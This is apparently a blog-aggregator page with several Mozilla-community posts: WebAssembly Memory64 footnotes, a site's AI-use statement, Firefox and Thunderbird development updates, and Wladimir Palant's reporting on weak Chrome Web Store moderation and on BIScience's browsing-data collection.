  • The memory control proposal for WebAssembly, which I co-champion, is exploring new features for WebAssembly memory. While none of the current ideas would remove the need for bounds checks, they could take advantage of virtual memory hardware to enable larger memories, more efficient use of large address spaces (such as reduced fragmentation for memory allocators), or alternative memory allocation techniques.

Memory64 may not matter for most developers today, but we think it is an important stepping stone to an exciting future for memory in WebAssembly.


  1. The rest of the proposal fleshes out the i64 mode, for example by modifying instructions like memory.fill to accept either i32 or i64 depending on the memory’s address type. The proposal also adds an i64 mode to tables, which are the primary mechanism used for function pointers and indirect calls. For simplicity, they are omitted from this post. 

  2. In practice the instructions may actually be more complicated, as they also need to account for integer overflow, offset, and align

  3. If you’re using the SpiderMonkey JS shell, you can try this yourself by using wasmDis(func) on any exported WebAssembly function. 

  4. Some hardware now also supports addresses larger than 48 bits, such as Intel processors with 57-bit addresses and 5-level paging, but this is not yet commonplace. 

  5. In practice, a few extra pages beyond 4GB will be reserved to account for offset and align, called “guard pages”. We could reserve another 4GB of memory (8GB in total) to account for every possible offset on every possible pointer, but in SpiderMonkey we instead choose to reserve just 32MiB + 64KiB for guard pages and fall back to explicit bounds checks for any offsets larger than this. (In practice, large offsets are very uncommon.) For more information about how we handle bounds checks on each supported platform, see this SMDOC comment (which seems to be slightly out of date), these constants, and this Ion code. It is also worth noting that we fall back to explicit bounds checks whenever we cannot use this allocation scheme, such as on 32-bit devices or resource-constrained mobile phones. 

Don MartiHow this site uses AI

This site is written by me personally except for anything that is clearly marked up and cited as a direct quotation. If you see anything on here that is not cited appropriately, please contact me.

Generative AI output appears on this site only if I think it really helps make a point and only if I believe that my use of a similar amount and kind of material from a relevant work in the training set would be fair use.

For example, I quote a sentence of generative AI output in LLMs and reputation management. I believe that I would have been within my fair use rights to use the same amount of text from a copyrighted history book or article.

In LLMs and the web advertising business, my point was not only that the Big Tech companies are crooked, but that it’s so obvious. A widely available LLM can easily point out that a site running Big Tech ads—for real brands—is full of ripped-off content. So I did include a short question and answer session with ChatGPT. It’s really getting old that big companies are constantly being shocked to discover infringement and other crimes when their own technology could have spotted it.

Usually when I mention AI or LLMs on here I don’t include any generated content.

More slash pages

Related

notes on ad-supported piracy LLM-generated sites are a refinement of an existing business model by infringing sites and their Big Tech enablers.

use a Large Language Model, or eat Tide Pods? Make up your own mind, I guess.

AI legal links

personal AI in the rugpull economy The big opportunity for personal AI could be in making your experiences less personalized.

Block AI training on a web site (Watch this space. More options and a possible standard could be coming in 2025.)

Money bots talk and bullshit bots walk?, boring bots ftw, How we get to the end of prediction market winter (AI and prediction markets complement each other—prediction markets need noise and arbitrage, AI needs a scalable way to measure quality of output.)

Firefox NightlyKey Improvements – These Weeks in Firefox: Issue 174

Highlights

  • Nicolas Chevobbe [:nchevobbe] Added $$$ , a console helper that retrieve elements from the document, including those in the ShadowDOM (#1899558)
  • Thanks to John Diamond for contributing changes to allow users to assign custom keyboard shortcuts for WebExtensions using the F13-F19 extended function keys
    • You can access this menu from the cog button in about:addons
    • The "Manage Extension Shortcuts" pane from about:addons. A series of keyboard shortcut mappings for an extension is displayed - one of which is mapped to the F19 key.

      You can find this menu in about:addons by clicking the cog icon and choosing “Manage Extension Shortcuts”

    • NOTE: F13-F19 function keys are still going to be invalid if specified in the default shortcuts set in the extension manifest
  • We’re going to launch the “Sections” feed experiment in New Tab soon. This layout changes how stories are laid out (new modular layouts instead of the same medium cards, some sections organized into categories)
    • Try it out yourself in Nightly by setting the following to TRUE
      • browser.newtabpage.activity-stream.discoverystream.sections.enabled
      • browser.newtabpage.activity-stream.discoverystream.sections.cards.enabled
  • Dale implemented searching Tab Groups by name in the Address Bar and showing them as Actions – Bug 1935195

Friends of the Firefox team

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug

  • Abhijeet Chawla[:ff2400t]
  • Meera Murthy

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • Thanks to Matt Mower for contributing CSS cleanup and modernization changes to the “Manage Extensions Shortcuts” section of about:addons – Bug 1921634
WebExtensions Framework
  • A warning message bar will be shown in the Extensions panel under the soft-blocked extensions that have been re-enabled by the user – Bug 1925291
WebExtension APIs
  • Native messaging support for snap-packaged Firefox has been now merged into mozilla-central – Bug 1661935
    • NOTE: Bug 1936114 is tracking fixing an AttributeError being hit by mach xpcshell-test as a side-effect of changes applied by Bug 1661935, until the fix is landed mach test is a short-term workaround to run xpcshell tests locally

DevTools

DevTools Toolbox
WebDriver BiDi
  • External:
    • Dan (temidayoazeez032) implemented the browser.getClientWindows command which allows clients to retrieve a list of information about the current browser windows. (#1855025)
    • Spencer (speneth1) removed a duplicated get windows helper which used to be implemented in two different classes. (#1925985)
    • Patrick (peshannon104) added a log to help investigate network events for which WebDriver BiDi didn’t manage to retrieve all the response information. (#1930848)
  • Updates:
    • Sasha improved support for installing extensions with Marionette and geckodriver. Geckodriver was updated to push the addon file to the device using base 64, which allowed to enable installing extensions on GeckoView. (#1806135)
    • Still on the topic of add-ons, Sasha also added a flag to install add-ons allowed to run in Private Browsing mode. (#1926311)
    • Julian added two new fields in BiDi network events: initiatorType and destination, coming from the fetch specification. The previous initiator.type field had no clear definition and is now deprecated. This supports the transition of Cypress from CDP to WebDriver BiDi. (#1904892)
    • Julian also fixed a small issue with those two new fields, which had unexpected values for top-level document loads. (#1933331)
    • After discussions during TPAC, we decided to stop emitting various events for the initial about:blank load. Sasha fixed a first gap on this topic: WebDriver BiDi will no longer emit browsingContext.navigationStarted events for such loads. (#1922014)
    • Henrik improved the stability of commands in Marionette in case the browsing context gets discarded (#1930530).
    • Henrik also did similar improvements for our WebDriver BiDi implementation, and fine-tuned our logic to retry commands sent to content processes (#1927073).
    • Julian reverted the message for UnexpectedAlertOpenError in Marionette to make sure we include the dialog’s text, as some clients seemed to rely on this behavior. (#1924469)
    • Thanks to :valentin who fixed an issue with nsITimedChannel.asyncOpenTime, which sometimes was set to 0 unexpectedly (#1931514). Prior to that, Julian added a small workaround to fallback on nsITimedChannel.channelCreationTime, but we will soon revert it (#1930849).
    • Sasha updated the browsingContext.traverseHistory command to only accept top-level browsing contexts. (#1924859)

Lint, Docs and Workflow

New Tab Page

  • FakeSpot recommended gifts experiment ended last week
  • For this next release the team is working on:
    • Supporting experiments with more industry standard ad sizes (Leaderboard and billboard)
    • Iterating/continuing Sections feed experiment
    • AdsFeed tech debt (Consolidating new tab ads logic into one place)

Password Manager

Places

  • Marco removed the old bookmarks transaction manager (undo/redo) code, as a better version of it shipped for a few months – Bug 1870794
  • Marco has enabled for release in Firefox 135 a safeguard preventing origins from overwhelming history with multiple consecutive visits, the feature has been baking in Nightly for the last few months – Bug 1915404
  • Yazan fixed a regression with certain svg favicons being wrongly picked, and thus having a bad contrast in the UI (note it may take a few days for some icons to be expired and replaced on load) – Bug 1933158 

Search and Navigation

  • Address bar revamp (aka Scotch Bonnet project)
    • Moritz fixed a bug causing address bar results flicker due to switch to tab results – Bug 1901161
    • Yazan fixed a bug with Actions search mode wrongly persisting after picking certain actions – Bug 1919549
    • Dale added badged entries to the unified search button to install new OpenSearch engines – Bug 1916074
    • Dale fixed a problem with some installed OpenSearch engines not persisting after restart – Bug 1927951
    • Daisuke implemented dynamic hiding of the unified search button (a few additional changes incoming to avoid shifting the URL on focus) – Bug 1928132
    • Daisuke fixed a problem with Esc not closing the address bar dropdown when unified search button is focused – Bug 1933459
  • Suggest
  • Other relevant fixes
    • Contributor Anthony Mclamb fixed unexpected console error messages when typing just ‘@’ in the address bar – Bug 1922535

Storybook/Reusable Components

  • Anna Kulyk (welcome! Yes of moz-message-bar fame!) cleaned up some leftover code in moz-card Bug 1910631
  • Mark Kennedy updated the Heartbeat infobar to use the moz-five-star component, and updated the component to support selecting a rating Bug 1864719
  • Mark Kennedy updated the about:debugging page to use the new –page-main-content-width design token which had the added benefit of bringing our design tokens into the chrome://devtools/ package Bug 1931919
  • Tim added support for support links in moz-fieldset Bug 1917070 Storybook
  • Hanna updated our support links to be placed after the description, if one is present Bug 1928501 Storybook

Mozilla ThunderbirdThunderbird Monthly Development Digest – December 2024

Happy New Year Thunderbirders! With a productive December and a good rest now behind us, the team is ready for an amazing year. Since the last update, we’ve had some successes that have felt great. We also completed a retrospective on a major pain point from last year. This has been humbling and has provided an important opportunity for learning and improvement.

Exchange Web Services support in Rust

Prior to the team taking their winter break, a cascade of deliverables passed the patch review process and landed in Daily. A healthy cadence of task completion saw a number of features reach users and lift the team’s spirits:

  • Copy to EWS from other protocol
  • Folder create
  • Enhanced logging
  • Local Storage
  • Save & manipulate Draft
  • Folder delete
  • Fix Edit Draft

Keep track of feature delivery here.

Account Hub

The overhauled Account Hub passed phase 1 QA review! A smaller team is handling phase 2 enhancements now that the initial milestone is complete. Our current milestone includes tasks for density and font awareness, refactoring of state management, OAuth prompts and more, which you can follow via Meta bug & progress tracking.

Global Database & Conversation View

Progress on the global database project was significant in the tail end of 2024, with foundational components taking shape. The team has implemented a database for folder management, including support for adding, removing, and reordering folders, and code for syncing the database with folders on disk. Preliminary work on a messages table and live view system is underway, enabling efficient filtering and handling of messages in real time. We have developed a mock UI to test these features, along with early documentation. Next steps include transitioning legacy folder and message functionality to a new “magic box” system, designed to simplify future refactoring and ensure a smooth migration without a disruptive “Big Bang” release.

Encryption

The future of email encryption has been on our minds lately. We have planned and started work on bridging the gap between some of the factions and solutions which are in place to provide quantum-resistant solutions in a post-quantum world. To provide ourselves with the breathing room to strategize and bring stakeholders together, we’re looking to hire a hardening team member who is familiar with encryption and comfortable with lower level languages like C. Stay tuned if this might be you!

In-App Notifications

With phase 1 of this project complete, we uplifted the feature to 134.0 Beta and notifications were shared with a significant number of users on both beta and daily releases in December. Data collected via Glean telemetry uncovered a couple of minor issues that have been addressed. It also provided peace of mind that the targeting system works as expected. Phase 2 of the project is well underway, and we have already uplifted some features and now merged them with 135.0 BetaMeta Bug & progress tracking.

Folder & Message Corruption

In the aftermath of our focused team effort to correct corruption issues introduced during our 2023 refactoring and solve other long-standing problems, we spent some time in self-reflection to perform a post mortem on the processes, decisions and situations which led to data loss and frustrations for users. While we regret a good number of preventable mistakes, it is also helpful to understand things outside of our control which played a part in this user-facing problem. You can find the findings and action plan here. We welcome any productive recommendations to improve future development in the more complex and arcane parts of the code.

New Features Landing Soon

Several requested features and fixes have reached our Daily users and include…

As usual, if you want to see things as they land, and help us squash some early bugs, you can always check the pushlog and try running daily, which would be immensely helpful for catching things early.

See you next month after FOSDEM!

Toby Pilling

Senior Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest – December 2024 appeared first on The Thunderbird Blog.

Wladimir PalantChrome Web Store is a mess

Let’s make one thing clear first: I’m not singling out Google’s handling of problematic and malicious browser extensions because it is worse than Microsoft’s for example. No, Microsoft is probably even worse but I never bothered finding out. That’s because Microsoft Edge doesn’t matter, its market share is too small. Google Chrome on the other hand is used by around 90% of the users world-wide, and one would expect Google to take their responsibility to protect its users very seriously, right? After all, browser extensions are one selling point of Google Chrome, so certainly Google would make sure they are safe?

Screenshot of the Chrome download page. A subtitle “Extend your experience” is visible with the text “From shopping and entertainment to productivity, find extensions to improve your experience in the Chrome Web Store.” Next to it a screenshot of the Chrome browser and some symbols on top of it representing various extensions.

Unfortunately, my experience reporting numerous malicious or otherwise problematic browser extensions speaks otherwise. Google appears to take the “least effort required” approach towards moderating Chrome Web Store. Their attempts to automate all things moderation do little to deter malicious actors, all while creating considerable issues for authors of legitimate add-ons. Even when reports reach Google’s human moderation team, the actions taken are inconsistent, and Google generally shies away from taking decisive actions against established businesses.

As a result, for a decade my recommendation for Chrome users has been to stay away from Chrome Web Store if possible. Whenever extensions are absolutely necessary, it should be known who is developing them, why, and how the development is being funded. Just installing some extension from Chrome Web Store, including those recommended by Google or “featured,” is very likely to result in your browsing data being sold or worse.

Google employees will certainly disagree with me. Sadly, much of it is organizational blindness. I am certain that you meant it well and that you did many innovative things to make it work. But looking at it from the outside, it’s the result that matters. And for the end users the result is a huge (and rather dangerous) mess.

Some recent examples

Five years ago I discovered that Avast browser extensions were spying on their users. Mozilla and Opera disabled the extension listings immediately after I reported it to them. Google on the other hand took two weeks where they supposedly discussed their policies internally. The result of that discussion was eventually their “no surprises” policy:

Building and maintaining user trust in the Chrome Web Store is paramount, which means we set a high bar for developer transparency. All functionalities of extensions should be clearly disclosed to the user, with no surprises. This means we will remove extensions which appear to deceive or mislead users, enable dishonest behavior, or utilize clickbaity functionality to artificially grow their distribution.

So when dishonest behavior from extensions is reported today, Google should act immediately and decisively, right? Let’s take a look at two examples that came up in the past few months.

In October I wrote about the refoorest extension deceiving its users. I could conclusively prove that Colibri Hero, the company behind refoorest, deceives their users on the number of trees they supposedly plant, incentivizing users into installing with empty promises. In fact, there is strong indication that the company never even donated for planting trees beyond a rather modest one-time donation.

Google got my report and dealt with it. What kind of action did they take? That’s a very good question that Google won’t answer. But refoorest is still available from Chrome Web Store, it is still “featured” and it still advertises the very same completely made up numbers of trees they supposedly planted. Google even advertises for the extension, listing it in the “Editors’ Picks extensions” collection, probably the reason why it gained some users since my report. So much about being honest. For comparison: refoorest used to be available from Firefox Add-ons as well but was already removed when I started my investigation. Opera removed the extension from their add-on store within hours of my report.

But maybe that issue wasn’t serious enough? After all, there is no harm done to users if the company is simply pocketing the money they claim to spend on a good cause. So also in October I wrote about the Karma extension spying on users. Users are not being notified about their browsing data being collected and sold, except for a note buried in their privacy policy. Certainly, that’s identical to the Avast case mentioned before and the extension needs to be taken down to protect users?

Screenshot of a query string parameters listing. The values listed include current_url (a Yahoo address with an email address in the query string), tab_id, user_id, distinct_id, local_time.

Again, Google got my report and dealt with it. And again I fail to see any result of their action. The Karma extension remains available on Chrome Web Store unchanged, it will still notify their server about every web page you visit (see screenshot above). The users still aren’t informed about this. Yet their Chrome Web Store page continues to claim “This developer declares that your data is not being sold to third parties, outside of the approved use cases,” a statement contradicted by their privacy policy. The extension appears to have lost its “Featured” badge at some point but now it is back.

Note: Of course Karma isn’t the only data broker that Google tolerates in Chrome Web Store. I published a guest article today by a researcher who didn’t want to disclose their identity, explaining their experience with BIScience Ltd., a company misleading millions of extension users to collect and sell their browsing data. This post also explains how Google’s “approved use cases” effectively allow pretty much any abuse of users’ data.

Mind you, neither refoorest nor Karma were alone but rather recruited or bought other browser extensions as well. These other browser extensions were turned outright malicious, with stealth functionality to perform affiliate fraud and/or collect users’ browsing history. Google’s reaction was very inconsistent here. While most extensions affiliated with Karma were removed from Chrome Web Store, the extension with the highest user numbers (and performing affiliate fraud without telling their users) was allowed to remain for some reason.

With refoorest, most affiliate extensions were removed or stopped using their Impact Hero SDK. Yet when I checked more than two months after my report two extensions from my original list still appeared to include that hidden affiliate fraud functionality and I found seven new ones that Google apparently didn’t notice.

The reporting process

Now you may be wondering: if I reported these issues, why do I have to guess what Google did in response to my reports? Actually, keeping me in the dark is Google’s official policy:

Screenshot of an email: Hello Developer, Thank you again for reporting these items. Our team is looking into the items  and will take action accordingly. Please refer to the  possible enforcement (hyperlinked) actions and note that we are unable to comment on the status of individual items. Thank you for your contributions to the extensions ecosystem. Sincerely, Chrome Web Store Developer Support

This is by the way the response I received in November after pointing out the inconsistent treatment of the extensions. A month later the state of affairs was still that some malicious extensions got removed while other extensions with identical functionality were available for users to install, and I have no idea why that is. I’ve heard before that Google employees aren’t allowed to discuss enforcement actions, and your guess is as good as mine as to whom this policy is supposed to protect.

Supposedly, the idea of not commenting on policy enforcement actions is hiding the internal decision making from bad actors, so that they don’t know how to game the process. If that’s the theory however, it isn’t working. In this particular case the bad actors got some feedback, be it through their extensions being removed or due to the adjustments demanded by Google. It’s only me, the reporter of these issues, who needs to be guessing.

But, and this is a positive development, I’ve received a confirmation that both these reports are being worked on. This is more than I usually get from Google which is: silence. And typically also no visible reaction either, at least until a report starts circulating in media publications forcing Google to act on it.

But let’s take a step back and ask ourselves: how does one report Chrome Web Store policy violations? Given how much Google emphasizes their policies, there should be an obvious way?

In fact, there is a support document on reporting issues. And when I started asking around, even Google employees would direct me to it.

If you find something in the Chrome Web Store that violates the Chrome Web Store Terms of Service, or trademark or copyright infringement, let us know.

Sounds good, right? Except that the first option says:

At the bottom left of the window, click Flag Issue.

Ok, that’s clearly the old Chrome Web Store. But we understand of course that they mean the “Flag concern” link which is nowhere near the bottom. And it gives us the following selection:

Screenshot of a web form offering a choice from the following options: Did not like the content, Not trustworthy, Not what I was looking for, Felt hostile, Content was disturbing, Felt suspicious

This doesn’t really seem like the place to report policy violations. Even “Felt suspicious” isn’t right for an issue you can prove. And, unsurprisingly, after choosing this option Google just responds with:

Your abuse report has been submitted successfully.

No way to provide any details. No asking for my contact details in case they have questions. No context whatsoever, merely “felt suspicious.” This is probably fed to some algorithm somewhere which might result in… what actually? Judging by malicious extensions where users have been vocally complaining, often for years: nothing whatsoever. This isn’t the way.

Well, there is another option listed in the document:

If you think an item in the Chrome Web Store violates a copyright or trademark, fill out this form.

Yes, Google seems to care about copyright and trademark violations, but a policy violation isn’t that. If we try the form nevertheless it gives us a promising selection:

Screenshot of a web form titled “Select the reason you wish to report content.” The available options are: Policy (Non-legal) Reasons to Report Content, Legal Reasons to Report Content

Finally! Yes, policy reasons are exactly what we are after, let’s click that. And there comes another choice:

Screenshot of a web form titled “Select the reason you wish to report content.” The only available option is: Child sexual abuse material

That’s really the only option offered. And I have questions. At the very least those are: in what jurisdiction is child sexual abuse material a non-legal reason to report content? And: since when is that the only policy that Chrome Web Store has?

We can go back and try “Legal Reasons to Report Content” of course but the options available are really legal issues: intellectual properties, court orders or violations of hate speech law. This is another dead end.

It took me a lot of asking around to learn that the real (and well-hidden) way to report Chrome Web Store policy violations is Chrome Web Store One Stop Support. I mean: I get it that Google must be getting lots of non-sense reports. And they probably want to limit that flood somehow. But making legitimate reports almost impossible can’t really be the way.

In 2019 Google launched the Developer Data Protection Reward Program (DDPRP) meant to address privacy violations in Chrome extensions. Its participation conditions were rather narrow for my taste, pretty much no issue would qualify for the program. But at least it was a reliable way to report issues which might even get forwarded internally. Unfortunately, Google discontinued this program in August 2024.

It’s not that I am very convinced of DDPRP’s performance. I’ve used that program twice. First time I reported Keepa’s data exfiltration. DDPRP paid me an award for the report but, from what I could tell, allowed the extension to continue unchanged. The second report was about the malicious PDF Toolbox extension. The report was deemed out of scope for the program but forwarded internally. The extension was then removed quickly, but that might have been due to the media coverage. The benefit of the program was really: it was a documented way of reaching a human being at Google that would look at a problematic extension.

Chrome Web Store and their spam issue

In theory, there should be no spam on Chrome Web Store. The policy is quite clear on that:

We don’t allow any developer, related developer accounts, or their affiliates to submit multiple extensions that provide duplicate experiences or functionality on the Chrome Web Store.

Unfortunately, this policy’s enforcement is lax at best. Back in June 2023 I wrote about a malicious cluster of Chrome extensions. I listed 108 extensions belonging to this cluster, pointing out their spamming in particular:

Well, 13 almost identical video downloaders, 9 almost identical volume boosters, 9 almost identical translation extensions, 5 almost identical screen recorders are definitely not providing value.

I’ve also documented the outright malicious extensions in this cluster, pointing out that other extensions are likely to turn malicious as well once they have sufficient users. And how did Google respond? The malicious extensions have been removed, yes. But other than that, 96 extensions from my original list remained active in January 2025, and there were of course more extensions that my original report didn’t list. For whatever reason, Google chose not to enforce their anti-spam policy against them.

And that’s merely one example. My most recent blog post documented 920 extensions using tricks to spam Chrome Web Store, most of them belonging to a few large extension clusters. As it turned out, Google was made aware of this particular trick a year before my blog post already. And again, for some reason Google chose not to act.

Can extension reviews be trusted?

So when you search for extensions in Chrome Web Store, many results will likely come from one of the spam clusters. But the choice to install a particular extension is typically based on reviews. Can at least these reviews be trusted? Concerning moderation of reviews Google says:

Google doesn’t verify the authenticity of reviews and ratings, but reviews that violate our terms of service will be removed.

And the important part in the terms of service is:

Your reviews should reflect the experience you’ve had with the content or service you’re reviewing. Do not post fake or inaccurate reviews, the same review multiple times, reviews for the same content from multiple accounts, reviews to mislead other users or manipulate the rating, or reviews on behalf of others. Do not misrepresent your identity or your affiliation to the content you’re reviewing.

Now you may be wondering how well these rules are being enforced. The obviously fake review on the Karma extension is still there, three months after being posted. Not that it matters, with their continuous stream of incoming five star reviews.

A month ago I reported an extension to Google that, despite having merely 10,000 users, received 19 five star reviews on a single day in September – and only a single (negative) review since then. I pointed out that it is a consistent pattern across all extensions of this account, e.g. another extension (merely 30 users) received 9 five star reviews on the same day. It really doesn’t get any more obvious than that. Yet all these reviews are still online.

Screenshot of seven reviews, all giving five stars and all from September 19, 2024. Top review is by Sophia Franklin saying “solved all my proxy switching issues. fast reliable and free.” Next review is by Robert Antony saying “very  user-friendly and efficient for managing proxy profiles.” The other reviews all continue along the same lines.

And it isn’t only fake reviews. The refoorest extension incentivizes reviews which violates Google’s anti-spam policy (emphasis mine):

Developers must not attempt to manipulate the placement of any extensions in the Chrome Web Store. This includes, but is not limited to, inflating product ratings, reviews, or install counts by illegitimate means, such as fraudulent or incentivized downloads, reviews and ratings.

It has been three months, and they are still allowed to continue. The extension gets a massive amount of overwhelmingly positive reviews, users get their fake trees, everybody is happy. Well, other than the people trying to make sense of these meaningless reviews.

With reviews being so easy to game, it looks like lots of extensions are doing it. Sometimes it shows as a clearly inflated review count, sometimes it’s the overwhelmingly positive or meaningless content. At this point, any user ratings with the average above 4 stars likely have been messed with.

The “featured” extensions

But at least the “Featured” badge is meaningful, right? It certainly sounds like somebody at Google reviewed the extension and considered it worthy of carrying the badge. At least Google’s announcement indeed suggests a manual review:

Chrome team members manually evaluate each extension before it receives the badge, paying special attention to the following:

  1. Adherence to Chrome Web Store’s best practices guidelines, including providing an enjoyable and intuitive experience, using the latest platform APIs and respecting the privacy of end-users.
  2. A store listing page that is clear and helpful for users, with quality images and a detailed description.

Yet looking through 920 spammy extensions I reported recently, most of them carry the “Featured” badge. Yes, even the endless copies of video downloaders, volume boosters, AI assistants, translators and such. If there is an actual manual review of these extensions as Google claims, it cannot really be thorough.

To provide a more tangible example, Chrome Web Store currently has Blaze VPN, Safum VPN and Snap VPN extensions carry the “Featured” badge. These extensions (along with Ishaan VPN which has barely any users) belong to the PDF Toolbox cluster which produced malicious extensions in the past. A cursory code inspection reveals that all four are identical and in fact clones of Nucleus VPN which was removed from Chrome Web Store in 2021. And they also don’t even work, no connections succeed. The extension not working is something users of Nucleus VPN complained about already, a fact that the extension compensated with fake reviews.

So it looks like the main criteria for awarding the “Featured” badge are the things which can be easily verified automatically: user count, Manifest V3, claims to respect privacy (not even the privacy policy, merely that the right checkbox was checked), a Chrome Web Store listing with all the necessary promotional images. Given how many such extensions are plainly broken, the requirements on the user interface and generally extension quality don’t seem to be too high. And providing unique functionality definitely isn’t on the list of criteria.

In other words: if you are a Chrome user, the “Featured” badge is completely meaningless. It is no guarantee that the extension isn’t malicious, not even an indication. In fact, authors of malicious extensions will invest some extra effort to get this badge. That’s because the website algorithm seems to weigh the badge considerably towards the extension’s ranking.

How did Google get into this mess?

Google Chrome first introduced browser extensions in 2011. At that point the dominant browser extensions ecosystem was Mozilla’s, having been around for 12 years already. Mozilla’s extensions suffered from a number of issues that Chrome developers noticed of course: essentially unrestricted privileges necessitated very thorough reviews before extensions could be published on Mozilla Add-ons website, due to high damage potential of the extensions (both intentional and unintentional). And since these reviews relied largely on volunteers, they often took a long time, with the publication delays being very frustrating to add-on developers.

Disclaimer: I was a reviewer on Mozilla Add-ons myself between 2015 and 2017.

Google Chrome was meant to address all these issues. It pioneered sandboxed extensions which allowed limiting extension privileges. And Chrome Web Store focused on automated reviews from the very start, relying on heuristics to detect problematic behavior in extensions, so that manual reviews would only be necessary occasionally and after the extension was already published. Eventually, market pressure forced Mozilla to adopt largely the same approaches.

Google’s over-reliance on automated tools caused issues from the very start, and it certainly didn’t get any better with the increased popularity of the browser. Mozilla accumulated a set of rules to make manual reviews possible, e.g. all code should be contained in the extension, so no downloading of extension code from web servers. Also, reviewers had to be provided with an unobfuscated and unminified version of the source code. Google didn’t consider any of this necessary for their automated review systems. So when automated review failed, manual review was often very hard or even impossible.

It’s only with the introduction of Manifest V3 now that Chrome finally prohibits remote hosted code. And it took until 2018 to prohibit code obfuscation, while Google’s reviewers still have to reverse minification for manual reviews. Mind you, we are talking about policies that were already long established at Mozilla when Google entered the market in 2011.

And extension sandboxing, while without doubt useful, didn’t really solve the issue of malicious extensions. I already wrote about one issue back in 2016:

The problem is: useful extensions will usually request this kind of “give me the keys to the kingdom” permission.

Essentially, this renders permission prompts useless. Users cannot possibly tell whether an extension has valid reasons to request extensive privileges. So legitimate extensions have to constantly deal with users who are confused about why the extension needs to “read and change all your data on all websites.” At the same time, users are trained to accept such prompts without thinking twice.

And then malicious add-ons come along, requesting extensive privileges under a pretense. Monetization companies put out guides for extension developers on how they can request more privileges for their extensions while fending off complains from users and Google alike. There is a lot of this going on in Chrome Web Store, and Manifest V3 couldn’t change anything about it.

So what we have now is:

  1. Automated review tools that malicious actors willing to invest some effort can work around.
  2. Lots of extensions with the potential for doing considerable damage, yet little way of telling which ones have good reasons for that and which ones abuse their privileges.
  3. Manual reviews being very expensive due to historical decisions.
  4. Massively inflated extension count due to unchecked spam.

Number 3 and 4 in particular seem to further trap Google in the “it needs to be automated” mindset. Yet adding more automated layers isn’t going to solve the issue when there are companies which can put a hundred employees on devising new tricks to avoid triggering detection. Yes, malicious extensions are big business.

What could Google do?

If Google were interested in making Chrome Web Store a safer place, I don’t think there is a way around investing considerable (manual) effort into cleaning up the place. Taking down a single extension won’t really hurt the malicious actors, they have hundreds of other extensions in the pipeline. Tracing the relationships between extensions on the other hand and taking down the entire cluster – that would change things.

As the saying goes, the best time to do this was a decade ago. The second best time is right now, when Chrome Web Store with its somewhat less than 150,000 extensions is certainly large but not yet large enough to make manual investigations impossible. Besides, there is probably little point in investigating abandoned extensions (latest release more than two years ago) which make up almost 60% of Chrome Web Store.

But so far Google’s actions have been entirely reactive, typically limited to extensions which already caused considerable damage. I don’t know whether they actually want to stay on top of this. From the business point of view there is probably little reason for that. After all, Google Chrome no longer has to compete for market share, having essentially won against the competition. Even with Chrome extensions not being usable, Chrome will likely stay the dominant browser.

In fact, Google has significant incentives to keep a particular class of extensions low, so one might even suspect intention behind allowing Chrome Web Store to be flooded with shady and outright malicious ad blockers.

Wladimir PalantBIScience: Collecting browsing history under false pretenses

  • This is a guest post by a researcher who wants to remain anonymous. You can contact the author via email.

Recently, John Tuckner of Secure Annex and Wladimir Palant published great research about how BIScience and its various brands collect user data. This inspired us to publish part of our ongoing research to help the extension ecosystem be safer from bad actors.

This post details what BIScience does with the collected data and how their public disclosures are inconsistent with actual practices, based on evidence compiled over several years.

Screenshot of a website citing a bunch of numbers: 10 Million+ opt-in panelists globally and growing, 60 Global Markets, 4.5 Petabyte behavioral data collected monthly, 13 Months average retention time of panelists, 250 Million online user events per day, 2 Million eCommerce product searches per day, 10 Million keyword searches recorded daily, 400 Million unique domains tracked daily<figcaption> Screenshot of claims on the BIScience website </figcaption>

Who is BIScience?

BIScience is a long-established data broker that owns multiple extensions in the Chrome Web Store (CWS) that collect clickstream data under false pretenses. They also provide a software development kit (SDK) to partner third-party extension developers to collect and sell clickstream data from users, again under false pretenses. This SDK will send data to sclpfybn.com and other endpoints controlled by BIScience.

“Clickstream data” is an analytics industry term for “browsing history”. It consists of every URL users visit as they browse the web.

According to their website, BIScience “provides the deepest digital & behavioral data intelligence to market research companies, brands, publishers & investment firms”. They sell clickstream data through their Clickstream OS product and sell derived data under other product names.

BIScience owns AdClarity. They provide “advertising intelligence” for companies to monitor competitors. In other words, they have a large database of ads observed across the web. They use data collected from services operated by BIScience and third parties they partner with.

BIScience also owns Urban Cyber Security. They provide VPN, ad blocking, and safe browsing services under various names: Urban VPN, 1ClickVPN, Urban Browser Guard, Urban Safe Browsing, and Urban Ad Blocker. Urban collects user browsing history from these services, which is then sold by BIScience to third parties through Clickstream OS, AdClarity, and other products.

BIScience also owned GeoSurf, a residential proxy service that shut down in December 2023.

BIScience collects data from millions of users

BIScience is a huge player in the browser extension ecosystem, based on their own claims and our observed activity. They also collect data from other sources, including Windows apps and Android apps that spy on other running apps.

The websites of BIScience and AdClarity make the following claims:

  • They collect data from 25 million users, over 250 million user events per day, 400 million unique domains
  • They process 4.5 petabytes of data every month
  • They are the “largest human panel based ad intelligence platform”

These numbers are the most recent figures from all pages on their websites, not only the home pages. They have consistently risen over the years based on archived website data, so it’s safe to say any lower figures on their website are outdated.

BIScience buys data from partner third-party extensions

BIScience proactively contacts extension developers to buy clickstream data. They claim to buy this data in anonymized form, and in a manner compliant with Chrome Web Store policies. Both claims are demonstrably false.

Several third-party extensions integrate with BIScience’s SDK. Some are listed in the Secure Annex blog post, and we have identified more in the IOCs section. There are additional extensions which use their own custom endpoint on their own domain, making it more difficult to identify their sale of user data to BIScience and potentially other data brokers. Secure Annex identifies October 2023 as the earliest known date of BIScience integrations. Our evidence points to 2019 or earlier.

Our internal data shows the Visual Effects for Google Meet extension and other extensions collecting data since at least mid-2022. BIScience has likely been collecting data from extensions since 2019 or earlier, based on public GitHub posts by BIScience representatives (2021, 2021, 2022) and the 2019 DataSpii research that found some references to AdClarity in extensions. BIScience was founded in 2009 when they launched GeoSurf. They later launched AdClarity in 2012.

BIScience receives raw data, not anonymized data

Despite BIScience’s claims that they only acquire anonymized data, their own extensions send raw URLs, and third-party extensions also send raw URLs to BIScience. Therefore BIScience collects granular clickstream data, not anonymized data.

If they meant to say that they only use/resell anonymized data, that’s not comforting either. BIScience receives the raw data and may store, use, or resell it as they choose. They may be compelled by governments to provide the raw data, or other bad actors may compromise their systems and access the raw data. In general, collecting more data than needed increases risks for user privacy.

Even if they anonymize data as soon as they receive it, anonymous clickstream data can contain sensitive or identifying information. A notable example is the Avast-Jumpshot case discovered by Wladimir Palant, who also wrote a deep dive into why anonymizing browsing history is very hard.

